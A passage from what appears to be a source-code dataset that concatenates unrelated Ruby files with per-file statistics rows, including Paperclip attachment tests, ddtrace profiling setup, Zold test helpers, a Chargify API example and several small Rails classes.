:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
end
should "have its definition return convert_options value when asked about convert_options" do
assert_equal "-strip -depth 8", Dummy.attachment_definitions[:avatar][:convert_options]
end
end
end
context "A model with no source_file_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
end
should "have its definition return nil when asked about source_file_options" do
assert ! Dummy.attachment_definitions[:avatar][:source_file_options]
end
context "redefined to have source_file_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:source_file_options => "-density 400",
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
end
should "have its definition return source_file_options value when asked about source_file_options" do
assert_equal "-density 400", Dummy.attachment_definitions[:avatar][:source_file_options]
end
end
end
[000,002,022].each do |umask|
context "when the umask is #{umask}" do
setup do
rebuild_model
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
@umask = File.umask(umask)
end
teardown do
File.umask @umask
@file.close
end
should "respect the current umask" do
@dummy.avatar = @file
@dummy.save
assert_equal 0666&~umask, 0666&File.stat(@dummy.avatar.path).mode
end
end
end
context "A model with a filesystem attachment" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
@bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"), 'rb')
assert @dummy.avatar = @file
assert @dummy.valid?, @dummy.errors.full_messages.join(", ")
assert @dummy.save
end
teardown { [@file, @bad_file].each(&:close) }
should "write and delete its files" do
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" "#{@dummy.avatar.path(style)}"]
assert_equal geo, `#{cmd}`.chomp, cmd
end
saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.path(s) }
@d2 = Dummy.find(@dummy.id)
assert_equal "100x15", `identify -format "%wx%h" "#{@d2.avatar.path}"`.chomp
assert_equal "434x66", `identify -format "%wx%h" "#{@d2.avatar.path(:original)}"`.chomp
assert_equal "300x46", `identify -format "%wx%h" "#{@d2.avatar.path(:large)}"`.chomp
assert_equal "100x15", `identify -format "%wx%h" "#{@d2.avatar.path(:medium)}"`.chomp
assert_equal "32x32", `identify -format "%wx%h" "#{@d2.avatar.path(:thumb)}"`.chomp
assert @dummy.valid?
assert @dummy.save
saved_paths.each do |p|
assert File.exists?(p)
end
@dummy.avatar.clear
assert_nil @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_paths.each do |p|
assert ! File.exists?(p)
end
@d2 = Dummy.find(@dummy.id)
assert_nil @d2.avatar_file_name
end
should "work exactly the same when new as when reloaded" do
@d2 = Dummy.find(@dummy.id)
assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
[:thumb, :medium, :large, :original].each do |style|
assert_equal @dummy.avatar.path(style), @d2.avatar.path(style)
end
saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.path(s) }
@d2.avatar.clear
assert @d2.save
saved_paths.each do |p|
assert ! File.exists?(p)
end
end
should "not abide things that don't have adapters" do
assert_raises(Paperclip::AdapterRegistry::NoHandlerError) do
@dummy.avatar = "not a file"
end
end
should "not be ok with bad files" do
@dummy.avatar = @bad_file
assert ! @dummy.valid?
end
should "know the difference between good files, bad files, and not files when validating" do
Dummy.validates_attachment_presence :avatar
@d2 = Dummy.find(@dummy.id)
@d2.avatar = @file
assert @d2.valid?, @d2.errors.full_messages.inspect
@d2.avatar = @bad_file
assert ! @d2.valid?
end
should "be able to reload without saving and not have the file disappear" do
@dummy.avatar = @file
assert @dummy.save, @dummy.errors.full_messages.inspect
@dummy.avatar.clear
assert_nil @dummy.avatar_file_name
@dummy.reload
assert_equal "5k.png", @dummy.avatar_file_name
end
context "that is assigned its file from another Paperclip attachment" do
setup do
@dummy2 = Dummy.new
@file2 = File.new(File.join(FIXTURES_DIR, "12k.png"), 'rb')
assert @dummy2.avatar = @file2
@dummy2.save
end
teardown { @file2.close }
should "work when assigned a file" do
assert_not_equal `identify -format "%wx%h" "#{@dummy.avatar.path(:original)}"`,
`identify -format "%wx%h" "#{@dummy2.avatar.path(:original)}"`
assert @dummy.avatar = @dummy2.avatar
@dummy.save
assert_equal @dummy.avatar_file_name, @dummy2.avatar_file_name
assert_equal `identify -format "%wx%h" "#{@dummy.avatar.path(:original)}"`,
`identify -format "%wx%h" "#{@dummy2.avatar.path(:original)}"`
end
end
end
context "A model with an attachments association and a Paperclip attachment" do
setup do
Dummy.class_eval do
has_many :attachments, :class_name => 'Dummy'
end
@file = File.new(File.join(File.dirname(__FILE__), "fixtures", "5k.png"), 'rb')
@dummy = Dummy.new
@dummy.avatar = @file
end
should "should not error when saving" do
@dummy.save!
end
end
if ENV['S3_TEST_BUCKET']
def s3_files_for attachment
[:thumb, :medium, :large, :original].inject({}) do |files, style|
data = `curl "#{attachment.url(style)}" 2>/dev/null`.chomp
t = Tempfile.new("paperclip-test")
t.binmode
t.write(data)
t.rewind
files[style] = t
files
end
end
def s3_headers_for attachment, style
`curl --head "#{attachment.url(style)}" 2>/dev/null`.split("\n").inject({}) do |h,head|
split_head = head.chomp.split(/\s*:\s*/, 2)
h[split_head.first.downcase] = split_head.last unless split_head.empty?
h
end
end
context "A model with an S3 attachment" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:storage => :s3,
:s3_credentials => File.new(File.join(File.dirname(__FILE__), "s3.yml")),
:default_style => :medium,
:bucket => ENV['S3_TEST_BUCKET'],
:path => ":class/:attachment/:id/:style/:basename.:extension"
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
@bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"), 'rb')
assert @dummy.avatar = @file
assert @dummy.valid?
assert @dummy.save
@files_on_s3 = s3_files_for @dummy.avatar
end
teardown do
@file.close
@bad_file.close
@files_on_s3.values.each(&:close)
end
context 'assigning itself to a new model' do
setup do
@d2 = Dummy.new
@d2.avatar = @dummy.avatar
@d2.save
end
should "have the same name as the old file" do
assert_equal @d2.avatar.original_filename, @dummy.avatar.original_filename
end
end
should "have the same contents as the original" do
assert_equal @file.read, @files_on_s3[:original].read
end
should "write and delete its files" do
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" "#{@files_on_s3[style].path}"]
assert_equal geo, `#{cmd}`.chomp, cmd
end
@d2 = Dummy.find(@dummy.id)
@d2_files = s3_files_for @d2.avatar
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" "#{@d2_files[style].path}"]
assert_equal geo, `#{cmd}`.chomp, cmd
end
@dummy.avatar = "not a valid file but not nil"
assert_equal File.basename(@file.path), @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
[:thumb, :medium, :large, :original].each do |style|
assert @dummy.avatar.exists?(style)
end
@dummy.avatar.clear
assert_nil @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
[:thumb, :medium, :large, :original].each do |style|
assert ! @dummy.avatar.exists?(style)
end
@d2 = Dummy.find(@dummy.id)
assert_nil @d2.avatar_file_name
end
should "work exactly the same when new as when reloaded" do
@d2 = Dummy.find(@dummy.id)
assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
[:thumb, :medium, :large, :original].each do |style|
assert_equal @dummy.avatar.to_file(style).read, @d2.avatar.to_file(style).read
end
saved_keys = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s) }
@d2.avatar.clear
assert @d2.save
[:thumb, :medium, :large, :original].each do |style|
assert ! @dummy.avatar.exists?(style)
end
end
should "know the difference between good files, bad files, not files, and nil" do
expected = @dummy.avatar.to_file
@dummy.avatar = "not a file"
assert @dummy.valid?
assert_equal expected.read, @dummy.avatar.to_file.read
@dummy.avatar = @bad_file
assert ! @dummy.valid?
@dummy.avatar = nil
assert @dummy.valid?
Dummy.validates_attachment_presence :avatar
@d2 = Dummy.find(@dummy.id)
@d2.avatar = @file
assert @d2.valid?
@d2.avatar = @bad_file
assert ! @d2.valid?
@d2.avatar = nil
assert ! @d2.valid?
end
should "be able to reload without saving and not have the file disappear" do
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
@dummy.reload
assert_equal "5k.png", @dummy.avatar_file_name
end
should "have the right content type" do
headers = s3_headers_for(@dummy.avatar, :original)
assert_equal 'image/png', headers['content-type']
end
end
end
end
| 32.894737 | 108 | 0.57625 |
e24c2b0a8f7cd8e20f92bf5488818cfe12ddfdbd | 594 | # frozen_string_literal: true
module Discounts
class Base < Micro::Case
attributes :balance, :quantity_condition
def call!
Failure result: { error: 'Error: this method should not be call directly' }
end
private
def new_balance
{ quantity: new_quantity,
price: new_price,
total: new_total,
discount: self.class.name.gsub('Discounts::', '').underscore }
end
def new_quantity
balance[:quantity]
end
def new_price
balance[:price]
end
def new_total
new_quantity * new_price
end
end
end
| 18 | 81 | 0.63468 |
d5ff9b025cc9d3db5aa8a2d20c96c98645631b2d | 468 | # frozen_string_literal: true
module Banzai
module Pipeline
class DescriptionPipeline < FullPipeline
WHITELIST = Banzai::Filter::SanitizationFilter::LIMITED.deep_dup.merge(
elements: Banzai::Filter::SanitizationFilter::LIMITED[:elements] - %w(pre code img ol ul li)
)
def self.transform_context(context)
super(context).merge(
# SanitizationFilter
whitelist: WHITELIST
)
end
end
end
end
| 24.631579 | 100 | 0.666667 |
6a8d8cd62025107c08c26f7f82ef9a0cb0736a6b | 471 | require 'spec_helper'
describe Sufia::UploadSetUpdateFailureService do
let(:depositor) { create(:user) }
let(:upload_set) { UploadSet.create }
let(:inbox) { depositor.mailbox.inbox }
describe "#call" do
subject { described_class.new(depositor, upload_set) }
it "sends failing mail" do
subject.call
expect(inbox.count).to eq(1)
inbox.each { |msg| expect(msg.last_message.subject).to eq('Failing Upload Set Update') }
end
end
end
| 26.166667 | 94 | 0.692144 |
7a6a7c6a44f409d379078377f34c01117d6f8c35 | 6,871 | require 'datadog/core/environment/variable_helpers'
require 'ddtrace/utils/only_once'
module Datadog
# Contains profiler for generating stack profiles, etc.
module Profiling # rubocop:disable Metrics/ModuleLength
GOOGLE_PROTOBUF_MINIMUM_VERSION = Gem::Version.new('3.0')
private_constant :GOOGLE_PROTOBUF_MINIMUM_VERSION
SKIPPED_NATIVE_EXTENSION_ONLY_ONCE = Datadog::Utils::OnlyOnce.new
private_constant :SKIPPED_NATIVE_EXTENSION_ONLY_ONCE
def self.supported?
unsupported_reason.nil?
end
def self.unsupported_reason
# NOTE: Only the first matching reason is returned, so try to keep a nice order on reasons -- e.g. tell users
# first that they can't use this on JRuby before telling them that they are missing protobuf
ruby_engine_unsupported? ||
native_library_failed_to_load? ||
protobuf_gem_unavailable? ||
protobuf_version_unsupported? ||
protobuf_failed_to_load?
end
private_class_method def self.ruby_engine_unsupported?
'JRuby is not supported' if RUBY_ENGINE == 'jruby'
end
private_class_method def self.protobuf_gem_unavailable?
# NOTE: On environments where protobuf is already loaded, we skip the check. This allows us to support environments
# where no Gem.loaded_version is NOT available but customers are able to load protobuf; see for instance
# https://github.com/teamcapybara/capybara/commit/caf3bcd7664f4f2691d0ca9ef3be9a2a954fecfb
if !defined?(::Google::Protobuf) && Gem.loaded_specs['google-protobuf'].nil?
"Missing google-protobuf dependency; please add `gem 'google-protobuf', '~> 3.0'` to your Gemfile or gems.rb file"
end
end
private_class_method def self.protobuf_version_unsupported?
# See above for why we skip the check when protobuf is already loaded; note that when protobuf was already loaded
# we skip the version check to avoid the call to Gem.loaded_specs. Unfortunately, protobuf does not seem to
# expose the gem version constant elsewhere, so in that setup we are not able to check the version.
if !defined?(::Google::Protobuf) && Gem.loaded_specs['google-protobuf'].version < GOOGLE_PROTOBUF_MINIMUM_VERSION
'Your google-protobuf is too old; ensure that you have google-protobuf >= 3.0 by ' \
"adding `gem 'google-protobuf', '~> 3.0'` to your Gemfile or gems.rb file"
end
end
private_class_method def self.protobuf_failed_to_load?
unless protobuf_loaded_successfully?
'There was an error loading the google-protobuf library; see previous warning message for details'
end
end
# The `google-protobuf` gem depends on a native component, and its creators helpfully tried to provide precompiled
# versions of this extension on rubygems.org.
#
# Unfortunately, for a long time, the supported Ruby versions metadata on these precompiled versions of the extension
# was not correctly set. (This is fixed in newer versions -- but not all Ruby versions we want to support can use
# these.)
#
# Thus, the gem can still be installed, but can be in a broken state. To avoid breaking customer applications, we
# use this helper to load it and gracefully handle failures.
private_class_method def self.protobuf_loaded_successfully?
return @protobuf_loaded if defined?(@protobuf_loaded)
begin
require 'google/protobuf'
@protobuf_loaded = true
rescue LoadError => e
# NOTE: We use Kernel#warn here because this code gets run BEFORE Datadog.logger is actually set up.
# In the future it'd be nice to shuffle the logger startup to happen first to avoid this special case.
Kernel.warn(
'[DDTRACE] Error while loading google-protobuf gem. ' \
"Cause: '#{e.message}' Location: '#{Array(e.backtrace).first}'. " \
'This can happen when google-protobuf is missing its native components. ' \
'To fix this, try removing and reinstalling the gem, forcing it to recompile the components: ' \
'`gem uninstall google-protobuf -a; BUNDLE_FORCE_RUBY_PLATFORM=true bundle install`. ' \
'If the error persists, please contact support via <https://docs.datadoghq.com/help/> or ' \
'file a bug at <https://github.com/DataDog/dd-trace-rb/blob/master/CONTRIBUTING.md#found-a-bug>.'
)
@protobuf_loaded = false
end
end
private_class_method def self.native_library_failed_to_load?
success, exception = try_loading_native_library
unless success
if exception
'There was an error loading the profiling native extension due to ' \
"'#{exception.message}' at '#{exception.backtrace.first}'"
else
'The profiling native extension did not load correctly. ' \
'If the error persists, please contact support via <https://docs.datadoghq.com/help/> or ' \
'file a bug at <https://github.com/DataDog/dd-trace-rb/blob/master/CONTRIBUTING.md#found-a-bug>.'
end
end
end
private_class_method def self.try_loading_native_library
if Datadog::Core::Environment::VariableHelpers.env_to_bool('DD_PROFILING_NO_EXTENSION', false)
SKIPPED_NATIVE_EXTENSION_ONLY_ONCE.run do
Kernel.warn(
'[DDTRACE] Skipped loading of profiling native extension due to DD_PROFILING_NO_EXTENSION environment ' \
'variable being set. ' \
'This option is experimental and will lead to the profiler not working in future releases. ' \
'If you needed to use this, please tell us why on <https://github.com/DataDog/dd-trace-rb/issues/new>.'
)
end
return [true, nil]
end
begin
require "ddtrace_profiling_native_extension.#{RUBY_VERSION}_#{RUBY_PLATFORM}"
success =
defined?(Datadog::Profiling::NativeExtension) && Datadog::Profiling::NativeExtension.send(:native_working?)
[success, nil]
rescue StandardError, LoadError => e
[false, e]
end
end
private_class_method def self.load_profiling
return false unless supported?
require 'ddtrace/profiling/ext/cpu'
require 'ddtrace/profiling/ext/forking'
require 'ddtrace/profiling/collectors/stack'
require 'ddtrace/profiling/exporter'
require 'ddtrace/profiling/recorder'
require 'ddtrace/profiling/scheduler'
require 'ddtrace/profiling/tasks/setup'
require 'ddtrace/profiling/transport/io'
require 'ddtrace/profiling/transport/http'
require 'ddtrace/profiling/profiler'
require 'ddtrace/profiling/native_extension'
require 'ddtrace/profiling/trace_identifiers/helper'
require 'ddtrace/profiling/pprof/pprof_pb'
true
end
load_profiling if supported?
end
end
| 45.503311 | 122 | 0.704264 |
d5723050822efcf632796fbe7436b23173f495f2 | 1,146 | module Gws::Circular::See
extend ActiveSupport::Concern
included do
field :see_type, type: String, default: 'normal'
field :seen, type: Hash, default: {}
permit_params :see_type
end
def seen_at(user)
self.seen[user.id.to_s].try { |time| time.in_time_zone }
end
def seen?(user)
!unseen?(user)
end
def unseen?(user = nil)
return false if user.nil?
seen.exclude?(user.id.to_s)
end
def set_seen(user)
self.seen[user.id.to_s] = Time.zone.now.utc
self
end
def unset_seen(user)
self.seen.delete(user.id.to_s)
self
end
def see_action_label(user)
key = seen?(user) ? 'unset_seen' : 'set_seen'
I18n.t(key, scope: 'gws/circular.post')
end
def see_type_options
%w(normal simple).map{ |key| [I18n.t(key, scope: 'gws/circular.options.see_type'), key] }
end
def seen_users
seen = self.seen.to_a.select { |user_id, seen_at| seen_at.present? }
seen_user_ids = seen.map { |user_id, seen_at| user_id }
Gws::User.in(id: seen_user_ids)
end
def see_type_simple?
see_type == "simple"
end
def see_type_normal?
!see_type_simple?
end
end
| 20.105263 | 93 | 0.658813 |
9167c4ce180e8c60e20c8bc1c7780f26470f1251 | 254 | # frozen_string_literal: true
module Sail
class ApplicationController < ActionController::Base # :nodoc:
protect_from_forgery with: :exception
protected
def current_user
main_app.scope.request.env["warden"]&.user
end
end
end
| 18.142857 | 64 | 0.728346 |
f8a18e9d38dbf874ed323581002bb163d90968f7 | 2,957 | # frozen_string_literal: true
# Copyright (c) 2018 Yegor Bugayenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
require 'tmpdir'
require_relative '../lib/zold/id'
require_relative '../lib/zold/wallet'
require_relative '../lib/zold/wallets'
require_relative '../lib/zold/sync_wallets'
require_relative '../lib/zold/key'
require_relative '../lib/zold/version'
require_relative '../lib/zold/remotes'
# Fake home dir.
# Author:: Yegor Bugayenko ([email protected])
# Copyright:: Copyright (c) 2018 Yegor Bugayenko
# License:: MIT
class FakeHome
attr_reader :dir
def initialize(dir = __dir__)
@dir = dir
end
def run
Dir.mktmpdir do |dir|
FileUtils.copy(File.join(__dir__, '../fixtures/id_rsa'), File.join(dir, 'id_rsa'))
yield FakeHome.new(dir)
end
end
def wallets
Zold::SyncWallets.new(Zold::Wallets.new(@dir), File.join(@dir, 'locks'))
end
def create_wallet(id = Zold::Id.new, dir = @dir)
target = Zold::Wallet.new(File.join(dir, id.to_s))
wallets.find(id) do |w|
w.init(id, Zold::Key.new(file: File.join(__dir__, '../fixtures/id_rsa.pub')))
File.write(target.path, File.read(w.path))
end
target
end
def create_wallet_json(id = Zold::Id.new)
require_relative '../lib/zold/score'
score = Zold::Score::ZERO
Dir.mktmpdir 'wallets' do |external_dir|
wallet = create_wallet(id, external_dir)
{
version: Zold::VERSION,
protocol: Zold::PROTOCOL,
id: wallet.id.to_s,
score: score.to_h,
wallets: 1,
mtime: wallet.mtime.utc.iso8601,
digest: wallet.digest,
balance: wallet.balance.to_i,
body: File.read(wallet.path)
}.to_json
end
end
def copies(wallet = create_wallet)
Zold::Copies.new(File.join(@dir, "copies/#{wallet.id}"))
end
def remotes
remotes = Zold::Remotes.new(file: File.join(@dir, 'secrets/remotes'))
remotes.clean
remotes
end
end
| 32.494505 | 88 | 0.701725 |
6a7e5b55dfab882a17072d8fdea822eb36c18913 | 143 | class ChangePublisherNameFieldToNotNull < ActiveRecord::Migration[7.1]
def change
change_column_null :publishers, :name, false
end
end
| 23.833333 | 70 | 0.79021 |
6acea90197dd5c44f00d3419878fb95cb53453c3 | 362 | # frozen_string_literal: true
class ConfirmationsController < ApplicationController
def show
user = User.confirm_by_token(params[:confirmation_token])
if user.errors.empty?
redirect_to sign_in_path, notice: t("messages.confirmations.confirmed")
else
redirect_to root_path, alert: t("messages.confirmations.failure")
end
end
end
| 25.857143 | 77 | 0.754144 |
ab5c634ead501bba112fb8b851951c18ed5d2c38 | 602 | # frozen_string_literal: true
require "spec_helper"
ENV["RAILS_ENV"] = "test"
require File.expand_path("../config/environment", __dir__)
abort("The Rails environment is running in production mode!") if Rails.env.production?
require "rspec/rails"
ActiveRecord::Migration.maintain_test_schema!
Dir["./spec/support/*.rb"].each { |f| require File.expand_path(f) }
RSpec.configure do |config|
config.infer_spec_type_from_file_location!
config.filter_rails_from_backtrace!
config.use_transactional_fixtures = true
def json_response
JSON.parse(response.body, symbolize_keys: true)
end
end
| 26.173913 | 86 | 0.777409 |
91d738c5228b6bf4b94c54c6d63d214ce783fe5a | 1,636 | #! /usr/bin/env ruby
require 'spec_helper'
require 'puppet/provider/confine/false'
describe Puppet::Provider::Confine::False do
it "should be named :false" do
Puppet::Provider::Confine::False.name.should == :false
end
it "should require a value" do
lambda { Puppet::Provider::Confine.new }.should raise_error(ArgumentError)
end
describe "when testing values" do
before { @confine = Puppet::Provider::Confine::False.new("foo") }
it "should use the 'pass?' method to test validity" do
@confine = Puppet::Provider::Confine::False.new("foo")
@confine.label = "eh"
@confine.expects(:pass?).with("foo")
@confine.valid?
end
it "should return true if the value is false" do
@confine.pass?(false).should be_true
end
it "should return false if the value is not false" do
@confine.pass?("else").should be_false
end
it "should produce a message that a value is true" do
@confine = Puppet::Provider::Confine::False.new("foo")
@confine.message("eh").should be_include("true")
end
end
it "should be able to produce a summary with the number of incorrectly true values" do
confine = Puppet::Provider::Confine::False.new %w{one two three four}
confine.expects(:pass?).times(4).returns(true).returns(false).returns(true).returns(false)
confine.summary.should == 2
end
it "should summarize multiple instances by summing their summaries" do
c1 = mock '1', :summary => 1
c2 = mock '2', :summary => 2
c3 = mock '3', :summary => 3
Puppet::Provider::Confine::False.summarize([c1, c2, c3]).should == 6
end
end
| 30.867925 | 94 | 0.668704 |
61b5a03e4c9070b33b2236fa15ae8ce374e7e6ec | 775 | #!/usr/bin/env ruby
# frozen_string_literal: true
$LOAD_PATH.unshift('./lib')
require 'binance'
require 'eventmachine'
require_relative '../../common'
logger = Common.setup_logger
client = Binance::Spot::WebSocket.new
EM.run do
onopen = proc { logger.info('connected to server') }
onmessage = proc { |msg, _type| logger.info(msg) }
onerror = proc { |e| logger.error(e) }
onclose = proc { logger.info('connection closed') }
callbacks = {
onopen: onopen,
onmessage: onmessage,
onerror: onerror,
onclose: onclose
}
# subscribe single stream
client.subscribe(stream: 'btcusdt@bookTicker', callbacks: callbacks)
# combined subscribing
client.subscribe(stream: ['btcusdt@bookTicker', 'btcusdt@miniTicker'], callbacks: callbacks)
end
| 23.484848 | 94 | 0.700645 |
113438055a6daaeeb86bddaee86255dacddca9a8 | 1,435 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-cloudfront/types'
require_relative 'aws-sdk-cloudfront/client_api'
require_relative 'aws-sdk-cloudfront/client'
require_relative 'aws-sdk-cloudfront/errors'
require_relative 'aws-sdk-cloudfront/waiters'
require_relative 'aws-sdk-cloudfront/resource'
require_relative 'aws-sdk-cloudfront/customizations'
# This module provides support for Amazon CloudFront. This module is available in the
# `aws-sdk-cloudfront` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# cloud_front = Aws::CloudFront::Client.new
# resp = cloud_front.associate_alias(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from Amazon CloudFront are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::CloudFront::Errors::ServiceError
# # rescues all Amazon CloudFront API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::CloudFront
GEM_VERSION = '1.57.0'
end
| 26.090909 | 85 | 0.75122 |
796812794b55b855d3103bbcb581d40bc7330c8b | 59 | module YouTube
class HTTPError < StandardError
end
end
| 11.8 | 33 | 0.779661 |
bbb3aeb21c9fb445d29f9a26b938db2f9674eb96 | 489 | # use when click to activation link in email
class AccountActivationsController < ApplicationController
def edit
user = User.find_by email: params[:email]
if user && !user.activated? && user.authenticated?(:activation, params[:id])
user.activate
log_in user
flash[:success] = t "controller.acc_activation.edit.success"
redirect_to user
else
flash[:danger] = t "controller.acc_activation.edit.danger"
redirect_to root_url
end
end
end
| 30.5625 | 80 | 0.703476 |
1c0e3c3e7cdd3132cfc0683f21335181b2843532 | 311 | #!/usr/bin/env ruby
#
# make sure the namespace is created
#
module Rex
module Encoding
module Xor
end end end
#
# include the Xor encodings
#
require 'rex/encoding/xor/generic'
require 'rex/encoding/xor/byte'
require 'rex/encoding/xor/word'
require 'rex/encoding/xor/dword'
require 'rex/encoding/xor/qword' | 15.55 | 36 | 0.755627 |
7aa768b52251f57b1e3cfe1c91f163257afbbf81 | 240 | # frozen_string_literal: true
require "test_helper"
class RuberDialogTest < Minitest::Test
def test_that_it_has_a_version_number
refute_nil ::RuberDialog::VERSION
end
def test_it_does_something_useful
assert true
end
end
| 17.142857 | 39 | 0.791667 |
28fbdde6b327058bc4d0ffcb9bc521a8f90a7cd5 | 984 | class GstEditingServices < Formula
desc "GStreamer Editing Services"
homepage "https://gstreamer.freedesktop.org/modules/gst-editing-services.html"
url "https://gstreamer.freedesktop.org/src/gst-editing-services/gstreamer-editing-services-1.14.0.tar.xz"
sha256 "8d5f90eb532f4cf4aa1466807ef92b05bd1705970d7aabe10066929bbc698d91"
revision 1
bottle do
sha256 "4e2e03a93ce8016174b938050675bde833a48ed73008d8464c8b50de9bd790ad" => :high_sierra
sha256 "121dfe755996c0aeb88a4c239be99ea1c831e8ab655886418721b4f47588401c" => :sierra
sha256 "aab3f5d4909908af856a96eafd11087ae775d06b416e6deaf4777d6f738a72d5" => :el_capitan
end
depends_on "gstreamer"
depends_on "gst-plugins-base"
def install
system "./configure", "--prefix=#{prefix}",
"--disable-gtk-doc",
"--disable-docbook"
system "make"
system "make", "install"
end
test do
system "#{bin}/ges-launch-1.0", "--ges-version"
end
end
| 33.931034 | 107 | 0.72561 |
ed04ba2da8c60ae26d4b0d3306bb6aed3af5022d | 1,394 | # Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# NOTE: This file is generated by running `rake version` in the top level of
# this repo. Do not edit this manually. Edit the VERSION file and run the rake
# task instead.
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
module ChefBin
CHEFBIN_ROOT = File.expand_path("../..", __FILE__)
VERSION = "16.2.80".freeze
end
#
# NOTE: the Chef::Version class is defined in version_class.rb
#
# NOTE: DO NOT Use the Chef::Version class on ChefConfig::VERSIONs. The
# Chef::Version class is for _cookbooks_ only, and cannot handle
# pre-release versions like "10.14.0.rc.2". Please use Rubygem's
# Gem::Version class instead.
#
| 39.828571 | 81 | 0.645624 |
bf36b1d42372e5d191ec4401b011040f85c42fb4 | 880 | $: << File.expand_path(File.dirname(__FILE__) + '/../lib')
require 'chargify_api_ares'
# You could load your credentials from a file...
chargify_config = YAML::load_file(File.join(File.dirname(__FILE__), '..', 'chargify.yml'))
Chargify.configure do |c|
c.subdomain = chargify_config['subdomain']
c.api_key = chargify_config['api_key']
end
# Fetch list of subscriptions
subscriptions = Chargify::Subscription.find(:all)
# Grab the first id
id = subscriptions.first.id
# Fetch a preview of the next renewal
preview = Chargify::Renewal::Preview.create(
:subscription_id => id,
)
# The next assessment date
puts preview.next_assessment_at
# The existing balance
puts preview.existing_balance_in_cents
# The total charges for the next renwal
puts preview.total_in_cents
# The total total amount due (existing balance + total)
puts preview.total_amount_due_in_cents
| 23.783784 | 90 | 0.760227 |
617eb288692c7096d817d806e094af405e094e50 | 6,694 | require 'forwardable'
require 'typhoeus'
require 'filemaker/configuration'
module Filemaker
class Server
extend Forwardable
# @return [Filemaker::Store::DatabaseStore] the database store
attr_reader :databases
alias database databases
alias db databases
def_delegators :@config, :host, :url, :endpoint, :log
def_delegators :@config, :account_name, :password
def_delegators :@config, :ssl_verifypeer, :ssl_verifyhost, :ssl, :timeout
def initialize
@config = Configuration.new
yield @config if block_given?
raise ArgumentError, 'Missing config block' if @config.not_configurable?
@databases = Store::DatabaseStore.new(self)
end
# @api private
